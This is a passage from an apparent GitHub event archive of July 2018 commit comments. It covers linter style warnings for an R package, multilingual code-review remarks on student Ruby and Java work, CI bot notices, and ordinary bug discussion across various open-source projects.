lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-23T22:29:45Z"}
{"id":"8006779760","type":"CommitCommentEvent","actor":{"login":"GregTCLTK"},"repo":{"name":"BigBotNetwork/V-Bucks"},"payload":{"comment":{"id":29806717,"position":null,"line":null,"path":null,"commit_id":"5af7872b2048eb1a127257301b8869951b52a0ae","created_at":"2018-07-23T22:29:58Z","updated_at":"2018-07-23T22:29:58Z","author_association":"MEMBER","body":"Was is"}},"created_at":"2018-07-23T22:29:58Z"}
{"id":"8006780976","type":"CommitCommentEvent","actor":{"login":"EinfachAlex"},"repo":{"name":"LeeDJD/Electron-RPC"},"payload":{"comment":{"id":29806723,"position":null,"line":null,"path":null,"commit_id":"650bba4adc128f3d7cbba2a0702d050a51bee85d","created_at":"2018-07-23T22:30:17Z","updated_at":"2018-07-23T22:30:17Z","author_association":"NONE","body":"Guter commit!"}},"created_at":"2018-07-23T22:30:17Z"}
{"id":"8006782114","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29806726,"position":null,"line":null,"path":null,"commit_id":"4a7ddd73a3de2dfe1703c48c85650168085fa0d4","created_at":"2018-07-23T22:30:34Z","updated_at":"2018-07-23T22:30:34Z","author_association":"COLLABORATOR","body":"![image](https://user-images.githubusercontent.com/6131799/43106392-c6868086-8ed8-11e8-9912-d6e26b94de6d.png)\r\n"}},"created_at":"2018-07-23T22:30:34Z"}
{"id":"8006789125","type":"CommitCommentEvent","actor":{"login":"vanfanel"},"repo":{"name":"bradharding/doomretro"},"payload":{"comment":{"id":29806746,"position":null,"line":null,"path":null,"commit_id":"3430e7d73e6cb3d84aa2b3bd233713f0891e2955","created_at":"2018-07-23T22:32:34Z","updated_at":"2018-07-23T22:32:34Z","author_association":"NONE","body":"@bradharding : I have just built latest sources, and yes, the frame desync is still present once in a while. What a mistery! I will keep building and testing on a daily basis"}},"created_at":"2018-07-23T22:32:34Z"}
{"id":"8006789543","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806748,"position":4,"line":4,"path":"Lesson_2/2.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:32:42Z","updated_at":"2018-07-23T22:32:42Z","author_association":"NONE","body":"Работающее решение, но его можно улучшить. Сейчас проверка осуществляется для каждого элемента между 10 и 100, но нас интересует только каждый пятый элемент массива. Если бы проверка была более требовательна по ресурсам и кол-во элементов в массиве было бы значительно больше, тут существенно терялась бы производительность. Как можно избежать проверки каждого элемента?"}},"created_at":"2018-07-23T22:32:42Z"}
{"id":"8006790169","type":"CommitCommentEvent","actor":{"login":"jrfnl"},"repo":{"name":"PHPCompatibility/PHPCompatibility"},"payload":{"comment":{"id":29806751,"position":null,"line":null,"path":null,"commit_id":"eba7501e48209d933ddb930f08830529fe6931a5","created_at":"2018-07-23T22:32:52Z","updated_at":"2018-07-23T22:32:52Z","author_association":"COLLABORATOR","body":"@jrchamp Excellent news! Would you like to send in a PR to update the sniff with the correct PHP version in which `$mode` was introduced ?"}},"created_at":"2018-07-23T22:32:52Z"}
{"id":"8006790351","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806752,"position":4,"line":4,"path":"Lesson_2/2.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:32:56Z","updated_at":"2018-07-23T22:32:56Z","author_association":"NONE","body":"И по поводу однострочных блоков я писал выше"}},"created_at":"2018-07-23T22:32:56Z"}
{"id":"8006796909","type":"CommitCommentEvent","actor":{"login":"dann1"},"repo":{"name":"OpenNebula/one"},"payload":{"comment":{"id":29806767,"position":null,"line":null,"path":null,"commit_id":"967662058300007606245b1f52e0c5a045a56c8f","created_at":"2018-07-23T22:34:56Z","updated_at":"2018-07-23T22:34:56Z","author_association":"NONE","body":"This was happening with rmdir\r\n\r\nrm: cannot remove '/usr/lib/one/ruby/onedb/fsck': Is a directory\r\nrm: cannot remove '/usr/lib/one/ruby/vendors/rbvmomi': Is a directory\r\nrm: cannot remove '/usr/lib/one/sunstone/public': Is a directory\r\nrmdir: failed to remove '/var/lib/one': Directory not empty\r\nrmdir: failed to remove '/etc/one': Directory not empty\r\nrmdir: failed to remove '/usr/lib/one': Directory not empty\r\n\r\nNow outputs this\r\nrm: cannot remove '/usr/lib/one/ruby/onedb/fsck': Is a directory\r\nrm: cannot remove '/usr/lib/one/ruby/vendors/rbvmomi': Is a directory\r\nrm: cannot remove '/usr/lib/one/sunstone/public': Is a directory\r\n\r\nbut it gets removed"}},"created_at":"2018-07-23T22:34:56Z"}
{"id":"8006798230","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"coneoproject/COFFEE"},"payload":{"comment":{"id":29806769,"position":null,"line":null,"path":null,"commit_id":"5a64937a5e3c841b78f4a73322319702ab58cd71","created_at":"2018-07-23T22:35:19Z","updated_at":"2018-07-23T22:35:19Z","author_association":"NONE","body":"This adds a lot of parentheses to the generated code. Is it desirable?"}},"created_at":"2018-07-23T22:35:19Z"}
{"id":"8006801153","type":"CommitCommentEvent","actor":{"login":"emzeidan"},"repo":{"name":"emzeidan/bamboo-specs-test"},"payload":{"comment":{"id":29806772,"position":null,"line":null,"path":null,"commit_id":"4d73b5526b12762f6e7649ff01dde5b9055931d1","created_at":"2018-07-23T22:36:09Z","updated_at":"2018-07-23T22:36:09Z","author_association":"OWNER","body":"# Error in Bamboo Specs\n:scroll: [View error logs](http://eliasz.office.atlassian.com:8085/spec-logs/46891009/4d73b5526b12762f6e7649ff01dde5b9055931d1.log?referrer=commit)\n\n"}},"created_at":"2018-07-23T22:36:09Z"}
{"id":"8006808918","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806784,"position":6,"line":6,"path":"Lesson_2/4.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:38:29Z","updated_at":"2018-07-23T22:38:29Z","author_association":"NONE","body":"ТЗ: Заполнить хеш гласными буквами, где значением будет являтся порядковый номер буквы в алфавите (a - 1).\r\nсделай еще один массив с гласными (или просто строку) и проверяй вхождение при помощи метода include?"}},"created_at":"2018-07-23T22:38:29Z"}
{"id":"8006810733","type":"CommitCommentEvent","actor":{"login":"viti95"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29806791,"position":null,"line":null,"path":null,"commit_id":"32506931717a6c4da8cd0266d463adb772ce1d7f","created_at":"2018-07-23T22:39:03Z","updated_at":"2018-07-23T22:39:03Z","author_association":"NONE","body":"This commit makes the Gran Turismo title screen look blueish (PlayStation EUR). Previous version was ok.\r\n![captura2](https://user-images.githubusercontent.com/8323882/43106639-db346f1a-8ed9-11e8-940c-b2fb44bdde1e.PNG)\r\n"}},"created_at":"2018-07-23T22:39:03Z"}
{"id":"8006813524","type":"CommitCommentEvent","actor":{"login":"lackac"},"repo":{"name":"elixir-lang/flow"},"payload":{"comment":{"id":29806800,"position":18,"line":610,"path":"lib/flow.ex","commit_id":"16fecf4bafef60a4d1742d889c28a0abe661cb30","created_at":"2018-07-23T22:39:53Z","updated_at":"2018-07-23T22:39:53Z","author_association":"CONTRIBUTOR","body":"@josevalim why are you using `IO.warn/1` here and above instead of `@deprecated`?"}},"created_at":"2018-07-23T22:39:53Z"}
{"id":"8006817461","type":"CommitCommentEvent","actor":{"login":"friuns2"},"repo":{"name":"LordNoteworthy/al-khaser"},"payload":{"comment":{"id":29806808,"position":null,"line":null,"path":null,"commit_id":"eb5966737a32dca8f36d2c064802bb710e492fd8","created_at":"2018-07-23T22:41:04Z","updated_at":"2018-07-23T22:41:04Z","author_association":"NONE","body":"ok big thanks for implementing this!"}},"created_at":"2018-07-23T22:41:04Z"}
{"id":"8006817494","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806809,"position":2,"line":2,"path":"Lesson_2/4.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:41:05Z","updated_at":"2018-07-23T22:41:05Z","author_association":"NONE","body":"не рекомендуем использовать однобуквенные переменные. Они усложняют чтение кода. Например тут переменная должна называться не i, а letter. Это точнее отражает содержимое переменной. Но, если нужен был индекс, можно посмотреть в сторону метода each_wth_index"}},"created_at":"2018-07-23T22:41:05Z"}
{"id":"8006817938","type":"CommitCommentEvent","actor":{"login":"milkmiruku"},"repo":{"name":"milkmiruku/Carla"},"payload":{"comment":{"id":29806811,"position":null,"line":null,"path":null,"commit_id":"b49641cf6e11387f4ba5c3ec7f02a6c7bd635cb3","created_at":"2018-07-23T22:41:12Z","updated_at":"2018-07-23T22:41:12Z","author_association":"OWNER","body":"@falktx - please excuse my naivete, but might there be a method of outputting a message to two MIDI ports simultaneously?"}},"created_at":"2018-07-23T22:41:12Z"}
{"id":"8006820523","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806815,"position":3,"line":3,"path":"Lesson_2/4.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:41:58Z","updated_at":"2018-07-23T22:41:58Z","author_association":"NONE","body":"begin тут лишний."}},"created_at":"2018-07-23T22:41:58Z"}
{"id":"8006820845","type":"CommitCommentEvent","actor":{"login":"emzeidan"},"repo":{"name":"emzeidan/bamboo-specs-test"},"payload":{"comment":{"id":29806817,"position":null,"line":null,"path":null,"commit_id":"4d73b5526b12762f6e7649ff01dde5b9055931d1","created_at":"2018-07-23T22:42:03Z","updated_at":"2018-07-23T22:42:03Z","author_association":"OWNER","body":"# Error in Bamboo Specs\n:scroll: [View error logs](http://eliasz.office.atlassian.com:8085/spec-logs/46891009/4d73b5526b12762f6e7649ff01dde5b9055931d1.log?referrer=commit)\n\n"}},"created_at":"2018-07-23T22:42:03Z"}
{"id":"8006824631","type":"CommitCommentEvent","actor":{"login":"Bungeebones"},"repo":{"name":"simpleledger/simple-ledger-protocol"},"payload":{"comment":{"id":29806830,"position":null,"line":null,"path":null,"commit_id":"08fa657c9ec18b87c59878bf7e82f61434551cd7","created_at":"2018-07-23T22:43:09Z","updated_at":"2018-07-23T22:43:09Z","author_association":"NONE","body":"Hi James, I've wrestled with trying to decentralise for years, literally, and, so, have concluded that I can only do so \"TO A POINT\". \r\n\r\nI would offer (and am working on) the other end of the logic where I complete the minimum level of centralisation I need and then will work to tokenize the remainder. This idea may be \"out there\" but I realized when I was building the databases for the decentralised part and separated \"read only\" user access from 'write access\" that I might be identifying the boundary between \"centralised' and 'decentralised\". I've got a small amount of accounting and bidding to manage with the centralised part.\r\n\r\nOn another topic, I was introduced to what I think is a rather weird type of database management called The Modofied Pre-Order Tree Traversal Algorithm. The advantages are the reduction in recursiveness and its ease to account for hierarchical data. The disadvantages are only a disadvantage if/when the data changes frequently because the hierarchy gets re-ordered at every entry. It looks like (from the goals of the project) that there may be a number of areas where this system may be a benefit. \r\n\r\nI'm confident that with the superb line up of developers you have that you are already aware. I thought I would mention it just because I think it is so rarely used and may not be on their radar screen. I find it very useful in organizing hierarchies both in the database and in the coding logic as well. Here's a link: https://www.sitepoint.com/hierarchical-data-database-2/"}},"created_at":"2018-07-23T22:43:09Z"}
{"id":"8006826372","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29806834,"position":null,"line":null,"path":null,"commit_id":"a1cc074f5750d3cc12bc04be8cf8292bb09aff7f","created_at":"2018-07-23T22:43:41Z","updated_at":"2018-07-23T22:43:41Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1696 of 1696 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-23T22:43:41Z"}
{"id":"8006826636","type":"CommitCommentEvent","actor":{"login":"bnreine"},"repo":{"name":"bnreine/js-jquery-modify-html-lab-bootcamp-prep-000"},"payload":{"comment":{"id":29806835,"position":null,"line":null,"path":null,"commit_id":"33d33001fca0ddbbe18e3b5412bf7a0e48d97808","created_at":"2018-07-23T22:43:46Z","updated_at":"2018-07-23T22:43:46Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-23T22:43:46Z"}
{"id":"8006827980","type":"CommitCommentEvent","actor":{"login":"neeasade"},"repo":{"name":"lutzmor/dotfiles"},"payload":{"comment":{"id":29806838,"position":null,"line":null,"path":null,"commit_id":"18d522ea1310ec870163bb45a71567d0b007d990","created_at":"2018-07-23T22:44:12Z","updated_at":"2018-07-23T22:44:12Z","author_association":"NONE","body":"FYI bootstrap is actually untested currently"}},"created_at":"2018-07-23T22:44:12Z"}
{"id":"8006828972","type":"CommitCommentEvent","actor":{"login":"Bucky21659"},"repo":{"name":"eternalcodes/EternalJK"},"payload":{"comment":{"id":29806841,"position":null,"line":null,"path":null,"commit_id":"e8c24f0cd83ef25559d8749414252aa03ac8b282","created_at":"2018-07-23T22:44:30Z","updated_at":"2018-07-23T22:44:30Z","author_association":"COLLABORATOR","body":"Someone came to me and asked about not being able to load some custom maps on ETJK/OpenJK and this was the best solution I came up with.  I did see that Xycaleth committed something to try and avoid this, but I didn't want to figure out why that didn't fix the problem completely.\r\n\r\nThis issue is still present on the latest OpenJK builds, and is probably present in our non-Windows releases."}},"created_at":"2018-07-23T22:44:30Z"}
{"id":"8006832833","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806849,"position":14,"line":14,"path":"Lesson_2/6.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:45:38Z","updated_at":"2018-07-23T22:45:38Z","author_association":"NONE","body":"Не используй merge для занесения данных в хеш, используй синтаксис: \r\nitems[item_name] = { ... }"}},"created_at":"2018-07-23T22:45:38Z"}
{"id":"8006833958","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/flow"},"payload":{"comment":{"id":29806856,"position":18,"line":610,"path":"lib/flow.ex","commit_id":"16fecf4bafef60a4d1742d889c28a0abe661cb30","created_at":"2018-07-23T22:46:01Z","updated_at":"2018-07-23T22:46:01Z","author_association":"MEMBER","body":"@lackac iirc there is another merge/2 below, so the guard is important (runtime based)."}},"created_at":"2018-07-23T22:46:01Z"}
{"id":"8006834796","type":"CommitCommentEvent","actor":{"login":"vbychkoviak"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29806863,"position":87,"line":165,"path":"lang/llvm-6.0/Portfile","commit_id":"c3f687bb5590f70197f0fbb52cb2d9f48a459eab","created_at":"2018-07-23T22:46:15Z","updated_at":"2018-07-23T22:46:15Z","author_association":"NONE","body":"@jeremyhu \r\n2002-xray-Define-O_CLOEXEC-for-older-SDKs-that-don-t-have.patch being removed,\r\nthere's no \r\n2001-xray-Define-O_CLOEXEC-for-older-SDKs-that-don-t-have.patch file in the \"macports-ports/lang/llvm-6.0/files/\" path\r\nthat breaks clang-6.0 install/upgrade because macports can't find the file. \r\n"}},"created_at":"2018-07-23T22:46:15Z"}
{"id":"8006838068","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/lscsoft-glue-feedstock"},"payload":{"comment":{"id":29806870,"position":null,"line":null,"path":null,"commit_id":"cf0abcb81c3f60d7d177ee51552936222ff73a3e","created_at":"2018-07-23T22:47:15Z","updated_at":"2018-07-23T22:47:15Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @rpfisher was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-23T22:47:15Z"}
{"id":"8006839668","type":"CommitCommentEvent","actor":{"login":"agagne"},"repo":{"name":"uw-it-edm/acs-extension"},"payload":{"comment":{"id":29806874,"position":16,"line":32,"path":"models/uwContentModel.xml","commit_id":"f2b885d43d927e6a1c29fbb8c1382f328783f493","created_at":"2018-07-23T22:47:44Z","updated_at":"2018-07-23T22:47:44Z","author_association":"CONTRIBUTOR","body":"why do we want this tokenized?"}},"created_at":"2018-07-23T22:47:44Z"}
{"id":"8006842895","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806881,"position":12,"line":12,"path":"Lesson_2/6.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:48:45Z","updated_at":"2018-07-23T22:48:45Z","author_association":"NONE","body":"Лучше вложенный хеш разбить на 2 значения, с ключами  :price и :quantity, то есть не использовать вводимые юзером значения как ключи. И на 2 строки ниже я написал, как принято записывать значения в хэш."}},"created_at":"2018-07-23T22:48:45Z"}
{"id":"8006845394","type":"CommitCommentEvent","actor":{"login":"emzeidan"},"repo":{"name":"emzeidan/bamboo-specs-test"},"payload":{"comment":{"id":29806883,"position":null,"line":null,"path":null,"commit_id":"4d73b5526b12762f6e7649ff01dde5b9055931d1","created_at":"2018-07-23T22:49:29Z","updated_at":"2018-07-23T22:49:29Z","author_association":"OWNER","body":"# Error in Bamboo Specs\n:scroll: [View error logs](http://eliasz.office.atlassian.com:8085/spec-logs/46891009/4d73b5526b12762f6e7649ff01dde5b9055931d1.log?referrer=commit)\n\n"}},"created_at":"2018-07-23T22:49:29Z"}
{"id":"8006854107","type":"CommitCommentEvent","actor":{"login":"rama64"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29806908,"position":null,"line":null,"path":null,"commit_id":"f8c5e5dc81509bba74adf89cecce4cd775a9e424","created_at":"2018-07-23T22:52:13Z","updated_at":"2018-07-23T22:52:13Z","author_association":"COLLABORATOR","body":"1) No confundan spring con los jsp... Eso que tienen ahí es un .jsp que es otra tecnología. Sí spring puede usar jsp, pero no son \"de spring\" digamos. \r\n2) Desde el punto de vista conceptual es un error que llegue algo así a la vista. Ustedes deberían usar DTO's (data transfer object) como recomendé en alguna teoría. Si no la vista termina \"quedando atada\" al modelo. A parte de exponer el modelo así como así (peligroso por cuestiones de seguridad por ejemplo como dijo jony en su momento), etc, etc, etc \r\n3) Sinceramente no se específicamente por dentro cómo funcionan los .jsp pero supongo que al igual que spring en ciertos casos harán uso de \"reflection\". Como también acotó jony en clases, al usar reflection no es necesario que los atributos tengan getters o setters o sean públicos. Esto hace (por ejemplo en el caso de Spring) que la única condición estrictamente necesaria que tiene que tener el modelo, es tener un constructor sin parámetros. Para todo lo demás puede hacer uso de reflection y de manera \"forzosa\" acceder a todo lo que necesite para poder darte el objeto o guardarlo. ¿No te gusta? (no se me ocurrió una mejor frase, perdón! hey! va de buen rollo je) hablá con los flacos de java porque ese reflection es de java... no de spring... Spring solo lo \"explota\". Supongo que justamente su objetivo es simplemente imponerte la menor condición de reglas para usarlo.  Supongo que con eso en mente llegaron a esto. Decisiones son decisiones... Es feo? coincido, pero si el objetivo es lo que dije, la mejor manera era esta (al menos en comparación). \r\n4) Spring es el estandar defacto. Muchas veces para tener reconocimiento y ser usado, no hace falta \"hacer lo mejor de lo mejor\", sino llegar rápido y que la gente lo adopte rápido. Si vamos al caso, Java tiene muuuuchísimas cosas feas, PHP, también, etc y siguen siendo lenguajes usados... ¿Eventualmente morirán? Seguramente... como todo en la informática, pero es lo que hay. ¿Pueden ser mejor? seguro! como todo en la informática...\r\nDe cualquier manera insisto en que hay que ver el panorama general de por qué se tomaron ciertas decisiones. Nunca, nada jamás, \"va a ser perfecto\". Lo importante del curso es entender eso y saber justificar las decisiones. Estoy seguro que toda esta gente podrá hacerlo. A parte uno no puede preveer siempre el futuro y \"evolucionar de la mejor manera\". Ya vas a ver sistemas de 10 años atrás y tener que hacer mantenimiento o cuando te toque \"adaptar\" cosas viejas a nuevas tecnologías y verás los cambios. Es algo super natural todo lo que dije, no te vuelvas loco jajjaa 